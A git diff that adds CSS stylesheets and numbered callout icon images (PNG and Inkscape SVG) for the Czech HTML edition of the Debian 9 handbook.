+	margin-left: 4em;
+}
+
+div.title {
+	margin-bottom: 1em;
+	font-weight: 14px;
+	font-weight: bold;
+	color: #336699;
+	word-wrap: break-word;
+}
+
+.example-contents {
+	background-color: #ffffff;
+}
+
+.example-contents .para {
+/*	 padding: 10px;*/
+}
+
+/*terminal/console text*/
+.computeroutput, 
+.option {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	font-weight:bold;
+}
+
+.replaceable {
+	font-style: italic;
+}
+
+.command, .filename, .keycap, .classname, .literal {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	font-weight:bold;
+}
+
+/* no bold in toc */
+.toc * {
+	font-weight: inherit;
+}
+
+.toc H1 {
+	font-weight: bold;
+}
+
+
+div.programlisting {
+	white-space: pre-wrap; /* css-3 */
+	white-space: -moz-pre-wrap !important; /* Mozilla, since 1999 */
+	white-space: -pre-wrap; /* Opera 4-6 */
+	white-space: -o-pre-wrap; /* Opera 7 */
+	word-wrap: break-word; /* Internet Explorer 5.5+ */
+}
+
+pre {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	display:block;
+	background-color: #f5f5f5;
+	color: #000000;
+/*	border: 1px solid #aaaaaa; */
+	margin-bottom: 1em;
+	padding:.5em 1em;
+	white-space: pre-wrap; /* css-3 */
+	white-space: -moz-pre-wrap !important; /* Mozilla, since 1999 */
+	white-space: -pre-wrap; /* Opera 4-6 */
+	white-space: -o-pre-wrap; /* Opera 7 */
+	word-wrap: break-word; /* Internet Explorer 5.5+ */
+	font-size: 0.9em;
+	border-style:none;
+	box-shadow: 0 2px 5px #AAAAAA inset;
+	-moz-box-shadow:  0 2px 5px #AAAAAA inset;
+	-webkit-box-shadow: 0 2px 5px #AAAAAA inset;
+	-o-box-shadow: 0 2px 5px #AAAAAA inset;
+}
+
+body.pdf pre {
+	border: 1px solid #AAAAAA;
+	box-shadow: none;
+	-moz-box-shadow: none;
+	-webkit-box-shadow: none;
+	-o-box-shadow: none;
+}
+
+
+pre .replaceable, 
+pre .keycap {
+}
+
+code {
+	font-family: "dejavu sans mono","liberation mono", "bitstream vera mono", "dejavu mono", monospace;
+	white-space: pre-wrap;
+	word-wrap: break-word;
+	font-weight:bold;
+}
+
+.parameter code {
+	display: inline;
+	white-space: pre-wrap; /* css-3 */
+	white-space: -moz-pre-wrap !important; /* Mozilla, since 1999 */
+	white-space: -pre-wrap; /* Opera 4-6 */
+	white-space: -o-pre-wrap; /* Opera 7 */
+	word-wrap: break-word; /* Internet Explorer 5.5+ */
+}
+
+code.email {
+	font-weight: normal;
+	font-family: "liberation sans", "Myriad ", "Bitstream Vera Sans", "Lucida Grande", "Luxi Sans", "Trebuchet MS", helvetica, verdana, arial, sans-serif;
+
+}
+
+/*Notifications*/
+div.warning:before {
+	content:url(../images/warning.png);
+	padding-left: 5px;
+}
+
+div.note:before {
+	content:url(../images/note.png);
+	padding-left: 5px;
+}
+
+div.important:before {
+	content:url(../images/important.png);
+	padding-left: 5px;
+}
+
+div.warning, div.note, div.important {
+	color: black;
+	margin: 0px;
+	padding: 0px;
+	background: none;
+	background-color: white;
+	margin-bottom: 1em;
+	border-bottom: 1px solid #aaaaaa;
+}
+
+div.admonition_header p {
+	margin: 0px;
+	padding: 0px;
+	color: #eeeeec;
+	padding-top: 0px;
+	padding-bottom: 0px;
+	height: 1.4em;
+	line-height: 1.4em;
+	font-size: 17px;
+	display:inline;
+}
+
+div.admonition_header {
+	background-origin:content-box;
+	clear: both;
+	margin: 0px;
+	padding: 0px;
+	margin-top: -40px;
+	padding-left: 58px;
+	line-height: 1.0px;
+	font-size: 1.0px;
+}
+
+div.warning div.admonition_header {
+	background: url(../images/red.png) top left repeat-x;
+	background-color: #590000;
+	background: -webkit-linear-gradient(#a40000,#590000);
+	background: linear-gradient(#a40000,#590000);
+}
+
+div.note div.admonition_header {
+	background: url(../images/green.png) top right repeat-x;
+	background-color: #597800;
+	background: -webkit-linear-gradient(#769f00,#597800);
+	background: linear-gradient(#769f00,#597800);
+}
+
+div.important div.admonition_header {
+	background: url(../images/yellow.png) top right repeat-x;
+	background-color: #a6710f;
+	background: -webkit-linear-gradient(#d08e13,#a6710f);
+	background: linear-gradient(#d08e13,#a6710f);
+}
+
+div.warning p:first-child,
+div.warning div.para:first-child,
+div.note p:first-child,
+div.note div.para:first-child,
+div.important p:first-child,
+div.important div.para:first-child {
+	padding: 0px;
+	margin: 0px;
+}
+
+div.admonition {
+	border: none;
+	border-left: 1px solid #aaaaaa;
+	border-right: 1px solid #aaaaaa;
+	padding:0px;
+	margin:0px;
+	padding-top: 1.5em;
+	padding-bottom: 1em;
+	padding-left: 2em;
+	padding-right: 1em;
+	background-color: #eeeeec;
+	-moz-border-radius: 0px;
+	-webkit-border-radius: 0px;
+	border-radius: 0px;
+}
+
+/*Page Title*/
+#title  {
+	display:block;
+	height:45px;
+	padding-bottom:1em;
+	margin:0px;
+}
+
+#title a.left{
+	display:inline;
+	border:none;
+}
+
+#title a.left img{
+	border:none;
+	float:left;
+	margin:0px;
+	margin-top:.7em;
+}
+
+#title a.right {
+	padding-bottom:1em;
+}
+
+#title a.right img {
+	border:none;
+	float:right;
+	margin:0px;
+	margin-top:.7em;
+}
+
+/*Table*/
+div.table {
+}
+
+table {
+	border: 1px solid #444;
+	width:100%;
+	border-collapse:collapse;
+	table-layout: fixed;
+	word-wrap: break-word;
+}
+
+table.blockquote,
+table.simplelist,
+.calloutlist table {
+	border-style: none;
+}
+
+table th {
+	text-align:left;
+	background-color:#6699cc;
+	padding:.3em .5em;
+	color:white;
+}
+
+table td {
+	padding:.15em .5em;
+}
+
+table tr.even td {
+	background-color:#f5f5f5;
+}
+
+tr:nth-child(even) {
+	background-color: #eeeeee;
+
+}
+
+
+table th p:first-child, table td p:first-child, table  li p:first-child,
+table th div.para:first-child, table td div.para:first-child, table  li div.para:first-child {
+	margin-top:0px;
+	padding-top:0px;
+	display:inline;
+}
+
+th, td {
+	border-style:none;
+	vertical-align: top;
+/* 	border: 1px solid #000; */
+}
+
+.blockquote td, 
+.simplelist th,
+.simplelist td {
+	border: none;
+}
+
+table table td {
+	border-bottom:1px dotted #aaa;
+	background-color:white;
+	padding:.6em 0px;
+}
+
+table table {
+	border:1px solid white;
+}
+
+td.remarkval {
+	color:#444;
+}
+
+td.fieldval {
+	font-weight:bold;
+}
+
+.lbname, .lbtype, .lbdescr, .lbdriver, .lbhost {
+	color:white;
+	font-weight:bold;
+	background-color:#999;
+	width:120px;
+}
+
+td.remarkval {
+	width:230px;
+}
+
+td.tname {
+	font-weight:bold;
+}
+
+th.dbfield {
+	width:120px;
+}
+
+th.dbtype {
+	width:70px;
+}
+
+th.dbdefault {
+	width:70px;
+}
+
+th.dbnul {
+	width:70px;
+}
+
+th.dbkey {
+	width:70px;
+}
+
+span.book {
+	margin-top:4em;
+	display:block;
+	font-size: 11pt;
+}
+
+span.book a{
+	font-weight:bold;
+}
+span.chapter {
+	display:block;
+}
+
+table.simplelist td, .calloutlist table td {
+	border-style: none;
+}
+
+
+table.lt-4-cols.lt-7-rows td {
+	border: none;
+}
+/*to simplify layout*/
+
+
+table.lt-4-cols.gt-14-rows tr:nth-child(odd) {
+	background-color: #fafafa;
+}
+/* to keep simple but stripe rows */ 
+
+
+.gt-8-cols td {
+	border-left: 1px solid #ccc;
+}
+
+.gt-8-cols td:first-child {
+	border-left: 0;
+}
+/* to apply vertical lines to differentiate columns*/
+
+/*Breadcrumbs*/
+#breadcrumbs ul li.first:before {
+	content:" ";
+}
+
+#breadcrumbs {
+	color:#900;
+	padding:3px;
+	margin-bottom:25px;
+}
+
+#breadcrumbs ul {
+	margin-left:0;
+	padding-left:0;
+	display:inline;
+	border:none;
+}
+
+#breadcrumbs ul li {
+	margin-left:0;
+	padding-left:2px;
+	border:none;
+	list-style:none;
+	display:inline;
+}
+
+#breadcrumbs ul li:before {
+	content:"\0020 \0020 \0020 \00BB \0020";
+	color:#333;
+}
+
+dl {
+	margin-top: 0px;
+	margin-left: 28px;
+}
+
+.toc dl {
+	margin-left: 10px;
+}
+
+/*index*/
+.glossary h3, 
+.index h3 {
+	font-size: 20px;
+	color:#aaa;
+	margin:0px;
+}
+
+.indexdiv {
+	margin-bottom:1em;
+}
+
+.glossary dt,
+.index dt {
+	color:#444;
+	padding-top:.5em;
+}
+
+.glossary dl dl dt, 
+.index dl dl dt {
+	color:#777;
+	font-weight:normal;
+	padding-top:0px;
+}
+
+.index dl dl dt:before {
+	content:"- ";
+	color:#ccc;
+}
+
+/*changes*/
+.footnote {
+	font-size: 10px;
+	margin: 0px;
+	color: #222;
+}
+
+.footnotes {
+	margin-bottom: 60px;
+}
+
+table .footnote {
+}
+
+sup {
+	margin:0px;
+	padding:0px;
+	font-size: 10px;
+	padding-left:0px;
+}
+
+.footnote {
+	position:relative;
+}
+
+.footnote sup  {
+	color: black;
+	left: .4em;
+}
+
+.footnote a:link,
+.footnote a:visited {
+	text-decoration:none;
+	border: none;
+}
+
+.footnote .para sup  {
+/*	position:absolute; */
+	vertical-align:text-bottom;
+}
+
+a.footnote {
+	padding-right: 0.5em;
+	text-decoration:none;
+	border: none;
+} 
+
+.footnote sup a:link, 
+.footnote sup a:visited {
+	color:#92917d;
+	text-decoration:none;
+}
+
+.footnote:hover sup a {
+	text-decoration:none;
+}
+
+.footnote p,.footnote div.para {
+	padding-left:1em;
+}
+
+.footnote a:link, 
+.footnote a:visited before{
+	color:#00537c;
+}
+
+.footnote a:hover {
+}
+
+/**/
+.pdf-break {
+}
+
+div.legalnotice {
+}
+
+div.abstract {
+}
+
+div.chapter {
+}
+
+
+div.titlepage, div.titlepage > div, div.titlepage > div > div {
+}
+
+div.preface, div.part {
+}
+
+div.appendix {
+}
+
+div.section {
+}
+
+
+dt.varlistentry {
+}
+
+dd {
+}
+
+div.note .replaceable, 
+div.important .replaceable, 
+div.warning .replaceable, 
+div.note .keycap, 
+div.important .keycap, 
+div.warning .keycap
+{
+}
+
+ul li p:last-child, ul li para:last-child {
+	margin-bottom:0px;
+	padding-bottom:0px;
+}
+
+/*document navigation*/
+.docnav a, .docnav strong {
+	border:none;
+	text-decoration:none;
+	font-weight:normal;
+}
+
+.docnav {
+	list-style:none;
+	margin:0px;
+	padding:0px;
+	position:relative;
+	width:100%;
+	padding-bottom:2em;
+	padding-top:1em;
+        height:2.5em;
+        line-height:2.5em;
+/*
+	border-top:1px dotted #ccc;
+        background-color: rgba(240, 240, 240, 0.9);
+-webkitbox-shadow: 0px .15em .5em rgba(0,0,0,0.2);
+  -moz-box-shadow: 0px .15em .5em rgba(0,0,0,0.2);
+       box-shadow: 0px .15em .5em rgba(0,0,0,0.2);
+*/
+}
+
+.docnav li {
+	list-style:none;
+	margin:0px;
+	padding:0px;
+	display:inline;
+	font-size: 14px;
+}
+
+.docnav li:before {
+	content:" ";
+}
+
+.docnav li.previous, .docnav li.next {
+	position:absolute;
+	top:1.5em;
+}
+
+.docnav li.up, .docnav li.home {
+	margin:0px 1.5em;
+}
+
+.docnav.top li.home {
+	color: #336699;
+	font-size: 22pt;
+	font-weight: bold;
+}
+
+
+.docnav li.previous {
+	left:0px;
+	text-align:left;
+}
+
+.docnav li.next {
+	right:0px;
+	text-align:right;
+}
+
+.docnav li.previous strong, .docnav li.next strong {
+	height: 17px;
+	display: block;
+}
+
+.docnav {
+	margin:0 auto;
+	text-align:center;
+}
+
+.docnav li.next a strong {
+	background:  url(../images/stock-go-forward.png) right 120% no-repeat;
+	padding-top:3px;
+	padding-bottom:4px;
+	padding-right:28px;
+}
+
+.docnav li.previous a strong {
+	background: url(../images/stock-go-back.png) left 120% no-repeat;
+	padding-top:3px;
+	padding-bottom:4px;
+	padding-left:28px;
+	padding-right:0.5em;
+}
+
+.docnav li.home a strong {
+	background: url(../images/stock-home.png) top left no-repeat;
+	padding:5px;
+	padding-left:28px;
+}
+
+.docnav li.up a strong {
+	background: url(../images/stock-go-up.png) top left no-repeat;
+	padding:5px;
+	padding-left:28px;
+}
+
+.docnav a:link, .docnav a:visited {
+	color:#666;
+}
+
+.docnav a:hover, .docnav a:focus, .docnav a:active {
+	color:black;
+}
+
+.docnav a {
+	max-width: 10px;
+	overflow:hidden;
+}
+
+.docnav a:link strong {
+	text-decoration:none;
+}
+
+.docnav {
+	margin:0 auto;
+	text-align:center;
+}
+
+ul.docnav {
+	margin-bottom: 1em;
+}
+/* Reports */
+.reports ul {
+	list-style:none;
+	margin:0px;
+	padding:0px;
+}
+
+.reports li{
+	margin:0px;
+	padding:0px;
+}
+
+.reports li.odd {
+	background-color: #eeeeee;
+	margin:0px;
+	padding:0px;
+}
+
+.reports dl {
+	display:inline;
+	margin:0px;
+	padding:0px;
+	float:right;
+	margin-right: 17em;
+	margin-top:-1.3em;
+}
+
+.reports dt {
+	display:inline;
+	margin:0px;
+	padding:0px;
+}
+
+.reports dd {
+	display:inline;
+	margin:0px;
+	padding:0px;
+	padding-right:.5em;
+}
+
+.reports h2, .reports h3{
+	display:inline;
+	padding-right:.5em;
+	font-size: 14px;
+	font-weight:normal;
+}
+
+.reports div.progress {
+	display:inline;
+	float:right;
+	width:16em;
+	background:#c00 url(../images/shine.png) top left repeat-x;
+	margin:0px;
+	margin-top:-1.3em;
+	padding:0px;
+	border:none;
+}
+
+/*uniform*/
+body.results, body.reports {
+	max-width:57em ;
+	padding:0px;
+}
+
+/*Progress Bar*/
+div.progress {
+	display:block;
+	float:left;
+	width:16em;
+	background:#c00 url(../images/shine.png) top left repeat-x;
+	height:1em;
+}
+
+div.progress span {
+	height:1em;
+	float:left;
+}
+
+div.progress span.translated {
+	background:#6c3 url(../images/shine.png) top left repeat-x;
+}
+
+div.progress span.fuzzy {
+	background:#ff9f00 url(../images/shine.png) top left repeat-x;
+}
+
+
+/*Results*/
+
+.results ul {
+	list-style:none;
+	margin:0px;
+	padding:0px;
+}
+
+.results li{
+	margin:0px;
+	padding:0px;
+}
+
+.results li.odd {
+	background-color: #eeeeee;
+	margin:0px;
+	padding:0px;
+}
+
+.results dl {
+	display:inline;
+	margin:0px;
+	padding:0px;
+	float:right;
+	margin-right: 17em;
+	margin-top:-1.3em;
+}
+
+.results dt {
+	display:inline;
+	margin:0px;
+	padding:0px;
+}
+
+.results dd {
+	display:inline;
+	margin:0px;
+	padding:0px;
+	padding-right:.5em;
+}
+
+.results h2, .results h3 {
+	display:inline;
+	padding-right:.5em;
+	font-size: 14px;
+	font-weight:normal;
+}
+
+.results div.progress {
+	display:inline;
+	float:right;
+	width:16em;
+	background:#c00 url(../images/shine.png) top left repeat-x;
+	margin:0px;
+	margin-top:-1.3em;
+	padding:0px;
+	border:none;
+}
+
+/* Dirty EVIL Mozilla hack for round corners */
+pre {
+	-moz-border-radius:11px;
+	-webkit-border-radius:11px;
+	border-radius: 11px;
+}
+
+.example {
+	-moz-border-radius:0px;
+	-webkit-border-radius:0px;
+	border-radius: 0px;
+}
+
+/* move these invisible fields out of the flow */
+.example > a:first-child,
+.table > a:first-child,
+.procedure > a:first-child {
+    float: left;
+}
+
+.package, .citetitle {
+	font-style: italic;
+}
+
+.titlepage .edition,
+.titlepage .releaseinfo {
+	color: #336699;
+	background-color: transparent;
+	margin-top: 1em;
+	margin-bottom: 1em;
+	font-size: 20px;
+	font-weight: bold;
+	text-align: center;
+}
+
+span.remark {
+	background-color: #ff00ff;
+}
+
+.draft {
+	background-image: url(../images/watermark-draft.png);
+	background-repeat: repeat-y;
+        background-position: center;
+}
+
+.foreignphrase {
+	font-style: inherit;
+}
+
+dt {
+	clear:both;
+}
+
+dt img {
+	border-style: none;
+	max-width: 112px;
+}
+
+dt object {
+	max-width: 112px;
+}
+
+dt .inlinemediaobject, dt object {
+	display: inline;
+	float: left;
+	margin-bottom: 1em;
+	padding-right: 1em;
+	width: 112px;
+}
+
+dl:after {
+	display: block;
+	clear: both;
+	content: "";
+}
+
+.toc dd {
+	padding-bottom: 0px;
+	margin-bottom: 1em;
+	padding-left: 1.3em;
+	margin-left: 0px;
+}
+
+div.toc > dl > dt {
+	padding-bottom: 0px;
+	margin-bottom: 0px;
+	margin-top: 1em;
+}
+
+
+.strikethrough {
+	text-decoration: line-through;
+}
+
+.underline {
+	text-decoration: underline;
+}
+
+.calloutlist img,
+.callout {
+	padding: 0px;
+	margin: 0px;
+	width: 12pt;
+	display: inline;
+	vertical-align: middle;
+}
+
+li.step > a:first-child {
+	display: block;
+}
+
+.stepalternatives {
+	list-style-image: none;
+	list-style-type: upper-alpha;
+}
+.task {
+}
+
+
+.added {
+	background-color: #99ff99;
+}
+
+.changed {
+	background-color: #ffff77;
+}
+
+.deleted {
+	background-color: #ff4455;
+	text-decoration: line-through;
+}
+
+
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/default.css b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/default.css
new file mode 100644
index 000000000..7fb9ada5c
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/default.css
@@ -0,0 +1,4 @@
+@import url("common.css");
+@import url("overrides.css");
+@import url("lang.css");
+
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/epub.css b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/epub.css
new file mode 100644
index 000000000..b0ffd43cb
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/epub.css
@@ -0,0 +1,115 @@
+/*headings*/
+h1, h2, h3, h4, h5, h6,
+div.producttitle,
+div.subtitle,
+div.author div.author,
+div.translator div.translator,
+div.othercredit div.othercredit,
+div.editor div.editor,
+div.contrib div.contrib,
+.title,
+.titlepage .edition {
+}
+
+div.para {
+	margin-top: 1em;
+}
+/* inline syntax highlighting */
+.perl_Alert {
+	color: #0000ff;
+}
+
+.perl_BaseN {
+	color: #007f00;
+}
+
+.perl_BString {
+	color: #5C3566;
+}
+
+.perl_Char {
+	color: #ff00ff;
+}
+
+.perl_Comment {
+	color: #888888;
+}
+
+
+.perl_DataType {
+	color: #0000ff;
+}
+
+
+.perl_DecVal {
+	color: #00007f;
+}
+
+
+.perl_Error {
+	color: #ff0000;
+}
+
+
+.perl_Float {
+	color: #00007f;
+}
+
+
+.perl_Function {
+	color: #007f00;
+}
+
+
+.perl_IString {
+	color: #5C3566;
+}
+
+
+.perl_Keyword {
+	color: #002F5D;
+}
+
+
+.perl_Operator {
+	color: #ffa500;
+}
+
+
+.perl_Others {
+	color: #b03060;
+}
+
+
+.perl_RegionMarker {
+	color: #96b9ff;
+}
+
+
+.perl_Reserved {
+	color: #9b30ff;
+}
+
+
+.perl_String {
+	color: #5C3566;
+}
+
+
+.perl_Variable {
+	color: #0000ff;
+}
+
+
+.perl_Warning {
+	color: #0000ff;
+}
+
+b, strong {
+	font-weight: bolder;
+}
+
+code.command {
+	font-family: monospace;
+	font-weight: bolder;
+}
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/lang.css b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/lang.css
new file mode 100644
index 000000000..bbfe539ad
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/lang.css
@@ -0,0 +1,2 @@
+/* Empty file by default to avoid HTTP error 404 since that file
+ * is loaded from default.css */
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/overrides.css b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/overrides.css
new file mode 100644
index 000000000..7315fbc7f
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/overrides.css
@@ -0,0 +1,179 @@
+a:link {
+	color:#0035C7;
+}
+
+a:visited {
+	color:#54638C;
+}
+
+h1 {
+	color:#C70036;
+}
+
+div.producttitle {
+	color:#C70036;
+}
+
+.section h1.title {
+	color:#C70036;
+}
+
+
+h2,h3,h4,h5,h6 {
+	color:#C70036;
+}
+
+.docnav.top li.home {
+        color: #C70036;
+}
+
+
+table {
+	border:1px solid #aaa;
+}
+
+table th {
+	background-color:#900;
+}
+
+table tr.even td {
+	background-color:#f5f5f5;
+}
+
+#title a {
+	height:54px;
+}
+
+.term{
+	color:#C70036;
+}
+
+.revhistory table th {
+	color:#C70036;
+}
+
+.titlepage .edition {
+	color: #C70036;
+}
+
+span.remark{
+	background-color: #ffff00;
+}
+
+/* Styles of block URLs */
+div.url {
+    margin-top: 0.5em;
+}
+div.url + div.url {
+    margin-top: 0;
+}
+
+/* Styles of sidebars */
+div.sidebar {
+    border: 2px solid #aaaaaa;
+    margin-top: 10px;
+    margin-bottom: 10px;
+    padding: 10px;
+    font-size: 90%;
+    background-color: #eeeeee;
+}
+
+div.sidebar > div.titlepage {
+    border-bottom: 1px solid;
+}
+
+div.sidebar > div.titlepage span.emphasis:nth-child(1) > em {
+    color: #666666;
+    font-style: normal;
+    font-variant: small-caps;
+}
+
+/* Modify behaviour within sidebars */
+div.sidebar p.title {
+    margin-bottom: 0;
+    margin-top: 0;
+}
+
+div.sidebar > p, div.sidebar > div.para {
+    margin-top: 1em;
+    margin-bottom: 0;
+}
+
+/* Styles of screens */
+.screen .computeroutput {
+    font-weight: normal;
+}
+
+/* CSS for the banner */
+#banner {
+    position: fixed;
+    top: 0;
+    right: 0;
+    z-index: 2;
+}
+#banner a {
+    display: block;
+    font-size: 13px;
+    font-family: "DejaVu Sans Condensed", "Liberation Sans", "Nimbus Sans L", Tahoma, Geneva, "Helvetica Neue", Helvetica, Arial, sans serif;
+    font-weight: bold;
+    text-decoration: none;
+    text-shadow: 0 0 0.5em #444;
+    border-bottom: none;
+
+    background-color: #9a0000;
+    color: #FFF;
+    text-align: center;
+    box-shadow: 0 0 13px #888;
+}
+#banner .text {
+    display: block;
+    padding: 3px 0;
+    border: 1px solid #bf6060;
+}
+#banner a:hover {
+    color: #ffff99;
+}
+
+@media (min-width: 1000px) {
+    #banner {
+	height: 149px;
+	width: 149px;
+	overflow: hidden;
+	padding: 0;
+	margin: 0;
+    }
+    #banner a {
+	width: 190px;
+	padding: 1px 15px 1px 25px;
+	position: relative;
+	left: 20px;
+	top: -37px;
+
+	-moz-transform-origin: 0 0 ;
+	-moz-transform: rotate(45deg);
+	-moz-box-shadow: 0 0 13px #888;
+
+	-webkit-transform-origin: 0 0 ;
+	-webkit-transform: rotate(45deg);
+	-webkit-box-shadow: 0 0 13px #888;
+
+	-ms-transform-origin: 0 0 ;
+	-ms-transform: rotate(45deg);
+	-ms-box-shadow: 0 0 13px #888;
+
+	transform-origin: 0 0 ;
+	transform: rotate(45deg);
+	box-shadow: 0 0 13px #888;
+    }
+}
+@media (max-width: 999px) {
+    #banner {
+	width: 100%;
+	position: fixed;
+	top: 0;
+	left: 0;
+    }
+    #title {
+	padding-top: 20px;
+    }
+}
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/print.css b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/print.css
new file mode 100644
index 000000000..773d8ae1b
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/css/print.css
@@ -0,0 +1,16 @@
+@import url("common.css");
+@import url("overrides.css");
+@import url("lang.css");
+
+#tocframe {
+	display: none;
+}
+
+body.toc_embeded {
+	margin-left: 30px;
+}
+
+.producttitle {
+	color: #336699;
+}
+
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/1.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/1.png
new file mode 100644
index 000000000..ef0beba85
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/1.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/1.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/1.svg
new file mode 100644
index 000000000..4c6bf5795
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/1.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;fill:#000000;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 17.853468,22.008438 -2.564941,0 0,-7.022461 c -5e-6,-0.143873 -5e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224122,0.224121 -0.08301,0.07748 -0.168786,0.157724 -0.257324,0.240723 -0.08854,0.08302 -0.17432,0.157723 -0.257324,0.224121 l -1.394531,1.120605 -1.245117,-1.543945 3.909668,-3.1127931 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/10.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/10.png
new file mode 100644
index 000000000..05f22391e
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/10.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/10.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/10.svg
new file mode 100644
index 000000000..0edda5b6f
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/10.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.6378,15.940567 c -9e-6,0.979497 -0.07748,1.853845 -0.232422,2.623047 -0.149422,0.769208 -0.392912,1.422202 -0.730468,1.958984 -0.332039,0.536785 -0.763679,0.94629 -1.294922,1.228516 -0.525722,0.282226 -1.162115,0.42334 -1.90918,0.42334 -0.702803,0 -1.314294,-0.141114 -1.834473,-0.42334 -0.520184,-0.282226 -0.951824,-0.691731 -1.294922,-1.228516 -0.3431,-0.536782 -0.600424,-1.189776 -0.771972,-1.958984 -0.166016,-0.769202 -0.249024,-1.64355 -0.249024,-2.623047 0,-0.979485 0.07471,-1.8566 0.224121,-2.631348 0.154948,-0.77473 0.398437,-1.430491 0.730469,-1.967285 0.33203,-0.536772 0.760903,-0.946277 1.286621,-1.228515 0.525713,-0.2877487 1.162106,-0.4316287 1.90918,-0.431641 0.69726,1.23e-5 1.305984,0.1411254 1.826172,0.42334 0.520175,0.282238 0.954582,0.691743 1.303223,1.228515 0.348624,0.536794 0.608715,1.192555 0.780273,1.967286 0.171541,0.774747 0.257315,1.654629 0.257324,2.639648 m -5.760742,0 c -3e-6,1.383468 0.118975,2.423832 0.356934,3.121094 0.237952,0.697268 0.650223,1.0459 1.236816,1.045898 0.575516,2e-6 0.987787,-0.345863 1.236816,-1.037597 0.254552,-0.691729 0.38183,-1.734859 0.381836,-3.129395 -6e-6,-1.38899 -0.127284,-2.43212 -0.381836,-3.129395 -0.249029,-0.702789 -0.6613,-1.054188 -1.236816,-1.054199 -0.293299,1.1e-5 -0.542322,0.08855 -0.74707,0.265625 -0.199223,0.177093 -0.362471,0.439951 -0.489746,0.788574 -0.127282,0.348642 -0.218591,0.785816 -0.273926,1.311524 -0.05534,0.52019 -0.08301,1.126146 -0.08301,1.817871"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
